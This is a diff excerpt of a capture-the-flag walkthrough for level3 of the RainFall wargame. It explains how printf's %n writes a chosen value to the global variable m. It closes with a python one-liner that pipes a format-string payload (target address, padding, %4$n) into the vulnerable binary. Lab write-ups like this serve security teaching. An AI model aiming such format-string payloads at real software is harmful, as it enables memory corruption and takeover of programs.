selfsigned/HackThePlanet/Rainfall/level3/walkthrough.md

 Now that we have access to the address of `m`, we can use `%n` to write a number to it as the BUG section of `printf` man tells us.
 The flag `%n` writes the number of character written so far to the pointer passed as argument, perfect to modify the value of `m`!

-Since our format string is 4 bytes long, we need to add 60 more bytes
+Since our format string is 4 bytes long, we need to add 60 more bytes.

 ```shell
 level3@RainFall:~$ python -c 'print "\x8c\x98\x04\x08" + "a"*60 + "%4$n"' | ./level3